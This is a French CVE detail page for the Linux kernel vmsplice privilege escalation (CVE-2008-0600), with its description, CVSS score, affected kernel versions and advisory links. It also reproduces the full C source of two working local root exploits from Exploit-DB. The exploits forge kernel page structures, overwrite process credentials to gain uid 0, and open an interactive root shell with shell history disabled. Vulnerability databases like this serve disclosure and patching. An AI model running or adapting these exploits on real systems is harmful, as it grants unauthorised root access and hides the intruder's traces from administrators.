CVE-2008-0600 : Détail

CVE-2008-0600

Code Injection
A03-Injection
0.47%V4
Local
2008-02-12
19h00 +00:00
2018-10-15
18h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 5092

Date de publication : 2008-02-08 23h00 +00:00
Auteur : qaaz
EDB Vérifié : Yes

/* * jessica_biel_naked_in_my_bed.c * * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. * Stejnak je to stare jak cyp a aj jakesyk rozbite. * * Linux vmsplice Local Root Exploit * By qaaz * * Linux 2.6.17 - 2.6.24.1 * * This is quite old code and I had to rewrite it to even compile. * It should work well, but I don't remeber original intent of all * the code, so I'm not 100% sure about it. You've been warned ;) * * -static -Wno-format */ #define _GNU_SOURCE #include <stdio.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <malloc.h> #include <limits.h> #include <signal.h> #include <unistd.h> #include <sys/uio.h> #include <sys/mman.h> #include <asm/page.h> #define __KERNEL__ #include <asm/unistd.h> #define PIPE_BUFFERS 16 #define PG_compound 14 #define uint unsigned int #define static_inline static inline __attribute__((always_inline)) #define STACK(x) (x + sizeof(x) - 40) struct page { unsigned long flags; int count; int mapcount; unsigned long private; void *mapping; unsigned long index; struct { long next, prev; } lru; }; void exit_code(); char exit_stack[1024 * 1024]; void die(char *msg, int err) { printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); fflush(stdout); fflush(stderr); exit(1); } #if defined (__i386__) #ifndef __NR_vmsplice #define __NR_vmsplice 316 #endif #define USER_CS 0x73 #define USER_SS 0x7b #define USER_FL 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "movl %0, 0x10(%%esp) ;" "movl %1, 0x0c(%%esp) ;" "movl %2, 0x08(%%esp) ;" "movl %3, 0x04(%%esp) ;" "movl %4, 0x00(%%esp) ;" "iret" : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code) ); } static_inline void * get_current() { unsigned long curr; __asm__ __volatile__ ( "movl %%esp, %%eax ;" "andl %1, %%eax ;" "movl (%%eax), %0" : "=r" (curr) : "i" (~8191) ); return (void *) curr; } #elif defined (__x86_64__) #ifndef __NR_vmsplice #define __NR_vmsplice 278 #endif #define USER_CS 0x23 #define USER_SS 0x2b #define USER_FL 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "swapgs ;" "movq %0, 0x20(%%rsp) ;" "movq %1, 0x18(%%rsp) ;" "movq %2, 0x10(%%rsp) ;" "movq %3, 0x08(%%rsp) ;" "movq %4, 0x00(%%rsp) ;" "iretq" : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code) ); } static_inline void * get_current() { unsigned long curr; __asm__ __volatile__ ( "movq %%gs:(0), %0" : "=r" (curr) ); return (void *) curr; } #else #error "unsupported arch" #endif #if defined (_syscall4) #define __NR__vmsplice __NR_vmsplice _syscall4( long, _vmsplice, int, fd, struct iovec *, iov, unsigned long, nr_segs, unsigned int, flags) #else #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) #endif static uint uid, gid; void kernel_code() { int i; uint *p = get_current(); for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() { if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); } int main(int argc, char *argv[]) { int pi[2]; size_t map_size; char * map_addr; struct iovec iov; struct page * pages[5]; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); /*****/ pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; pages[1] = pages[0] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[0]); printf("[+] page: 0x%lx\n", pages[1]); pages[0]->flags = 1 << PG_compound; pages[0]->private = (unsigned long) pages[0]; pages[0]->count = 1; pages[1]->lru.next = (long) kernel_code; /*****/ pages[2] = *(void **) pages[0]; pages[3] = pages[2] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[2]); printf("[+] page: 0x%lx\n", pages[3]); pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2]; pages[2]->count = 1; pages[3]->lru.next = (long) kernel_code; /*****/ pages[4] = *(void **) &(int[2]){PAGE_SIZE,0}; map_size = PAGE_SIZE; map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[4]); /*****/ map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE; map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); /*****/ map_size -= 2 * PAGE_SIZE; if (munmap(map_addr + map_size, PAGE_SIZE) < 0) die("munmap", errno); /*****/ if (pipe(pi) < 0) die("pipe", errno); close(pi[0]); iov.iov_base = map_addr; iov.iov_len = ULONG_MAX; signal(SIGPIPE, exit_code); _vmsplice(pi[1], &iov, 1, 0); die("vmsplice", errno); return 0; } // milw0rm.com [2008-02-09]
Exploit Database EDB-ID : 5093

Date de publication : 2008-02-08 23h00 +00:00
Auteur : qaaz
EDB Vérifié : Yes

/* * diane_lane_fucked_hard.c * * Linux vmsplice Local Root Exploit * By qaaz * * Linux 2.6.23 - 2.6.24 */ #define _GNU_SOURCE #include <stdio.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/uio.h> #define TARGET_PATTERN " sys_vm86old" #define TARGET_SYSCALL 113 #ifndef __NR_vmsplice #define __NR_vmsplice 316 #endif #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) #define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) #define TRAMP_CODE (void *) trampoline #define TRAMP_SIZE ( sizeof(trampoline) - 1 ) unsigned char trampoline[] = "\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ "\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ "\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ "\x75\x02" /* jne +2 */ "\xff\xd1" /* call *%ecx */ "\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ "\xc3" /* ret */ ; void die(char *msg, int err) { printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); fflush(stdout); fflush(stderr); exit(1); } long get_target() { FILE *f; long addr = 0; char line[128]; f = fopen("/proc/kallsyms", "r"); if (!f) die("/proc/kallsyms", errno); while (fgets(line, sizeof(line), f)) { if (strstr(line, TARGET_PATTERN)) { addr = strtoul(line, NULL, 16); break; } } fclose(f); return addr; } static inline __attribute__((always_inline)) void * get_current() { unsigned long curr; __asm__ __volatile__ ( "movl %%esp, %%eax ;" "andl %1, %%eax ;" "movl (%%eax), %0" : "=r" (curr) : "i" (~8191) ); return (void *) curr; } static uint uid, gid; void kernel_code() { int i; uint *p = get_current(); for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } } int main(int argc, char *argv[]) { int pi[2]; long addr; struct iovec iov; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); addr = get_target(); printf("[+] addr: 0x%lx\n", addr); if (pipe(pi) < 0) die("pipe", errno); iov.iov_base = (void *) addr; iov.iov_len = TRAMP_SIZE; write(pi[1], TRAMP_CODE, TRAMP_SIZE); _vmsplice(pi[0], &iov, 1, 0); gimmeroot(); if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); return 0; } // milw0rm.com [2008-02-09]

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17.1

Linux>>Linux_kernel >> Version 2.6.17.2

Linux>>Linux_kernel >> Version 2.6.17.3

Linux>>Linux_kernel >> Version 2.6.17.4

Linux>>Linux_kernel >> Version 2.6.17.5

Linux>>Linux_kernel >> Version 2.6.17.6

Linux>>Linux_kernel >> Version 2.6.17.7

Linux>>Linux_kernel >> Version 2.6.17.8

Linux>>Linux_kernel >> Version 2.6.17.9

Linux>>Linux_kernel >> Version 2.6.17.10

Linux>>Linux_kernel >> Version 2.6.17.11

Linux>>Linux_kernel >> Version 2.6.17.12

Linux>>Linux_kernel >> Version 2.6.17.13

Linux>>Linux_kernel >> Version 2.6.17.14

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18.1

Linux>>Linux_kernel >> Version 2.6.18.2

Linux>>Linux_kernel >> Version 2.6.18.3

Linux>>Linux_kernel >> Version 2.6.18.4

Linux>>Linux_kernel >> Version 2.6.18.5

Linux>>Linux_kernel >> Version 2.6.18.6

Linux>>Linux_kernel >> Version 2.6.18.7

Linux>>Linux_kernel >> Version 2.6.18.8

Linux>>Linux_kernel >> Version 2.6.19

Linux>>Linux_kernel >> Version 2.6.19

Linux>>Linux_kernel >> Version 2.6.19

Linux>>Linux_kernel >> Version 2.6.19

Linux>>Linux_kernel >> Version 2.6.19

Linux>>Linux_kernel >> Version 2.6.19.1

Linux>>Linux_kernel >> Version 2.6.19.2

Linux>>Linux_kernel >> Version 2.6.19.3

Linux>>Linux_kernel >> Version 2.6.20

Linux>>Linux_kernel >> Version 2.6.20

Linux>>Linux_kernel >> Version 2.6.20.1

Linux>>Linux_kernel >> Version 2.6.20.2

Linux>>Linux_kernel >> Version 2.6.20.3

Linux>>Linux_kernel >> Version 2.6.20.4

Linux>>Linux_kernel >> Version 2.6.20.5

Linux>>Linux_kernel >> Version 2.6.20.6

Linux>>Linux_kernel >> Version 2.6.20.7

Linux>>Linux_kernel >> Version 2.6.20.8

Linux>>Linux_kernel >> Version 2.6.20.9

Linux>>Linux_kernel >> Version 2.6.20.10

Linux>>Linux_kernel >> Version 2.6.20.11

Linux>>Linux_kernel >> Version 2.6.20.12

Linux>>Linux_kernel >> Version 2.6.20.13

Linux>>Linux_kernel >> Version 2.6.20.14

Linux>>Linux_kernel >> Version 2.6.20.15

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21.1

Linux>>Linux_kernel >> Version 2.6.21.2

Linux>>Linux_kernel >> Version 2.6.21.3

Linux>>Linux_kernel >> Version 2.6.21.4

Linux>>Linux_kernel >> Version 2.6.22

Linux>>Linux_kernel >> Version 2.6.22

Linux>>Linux_kernel >> Version 2.6.22.1

Linux>>Linux_kernel >> Version 2.6.22.3

Linux>>Linux_kernel >> Version 2.6.22.4

Linux>>Linux_kernel >> Version 2.6.22.5

Linux>>Linux_kernel >> Version 2.6.22.6

Linux>>Linux_kernel >> Version 2.6.22.7

Linux>>Linux_kernel >> Version 2.6.22.16

Linux>>Linux_kernel >> Version 2.6.23

Linux>>Linux_kernel >> Version 2.6.23

Linux>>Linux_kernel >> Version 2.6.23

Linux>>Linux_kernel >> Version 2.6.23.1

Linux>>Linux_kernel >> Version 2.6.23.2

Linux>>Linux_kernel >> Version 2.6.23.3

Linux>>Linux_kernel >> Version 2.6.23.4

Linux>>Linux_kernel >> Version 2.6.23.5

Linux>>Linux_kernel >> Version 2.6.23.6

Linux>>Linux_kernel >> Version 2.6.23.7

Linux>>Linux_kernel >> Version 2.6.23.9

Linux>>Linux_kernel >> Version 2.6.23.14

Linux>>Linux_kernel >> Version 2.6.24

Linux>>Linux_kernel >> Version 2.6.24

Linux>>Linux_kernel >> Version 2.6.24

Linux>>Linux_kernel >> Version 2.6.24.1

Références

http://marc.info/?l=linux-kernel&m=120263652322197&w=2
Tags : mailing-list, x_refsource_MLIST
http://www.securityfocus.com/bid/27801
Tags : vdb-entry, x_refsource_BID
http://www.mandriva.com/security/advisories?name=MDVSA-2008:043
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/28858
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2008/dsa-1494
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.ubuntu.com/usn/usn-577-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/28875
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28933
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=linux-kernel&m=120266353621139&w=2
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/28889
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28937
Tags : third-party-advisory, x_refsource_SECUNIA
https://www.exploit-db.com/exploits/5092
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.mandriva.com/security/advisories?name=MDVSA-2008:044
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/29245
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=linux-kernel&m=120264520431307&w=2
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/28896
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28925
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28835
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28912
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2008-0129.html
Tags : vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=linux-kernel&m=120266328220808&w=2
Tags : mailing-list, x_refsource_MLIST
http://securitytracker.com/id?1019393
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/30818
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/27704
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=linux-kernel&m=120264773202422&w=2
Tags : mailing-list, x_refsource_MLIST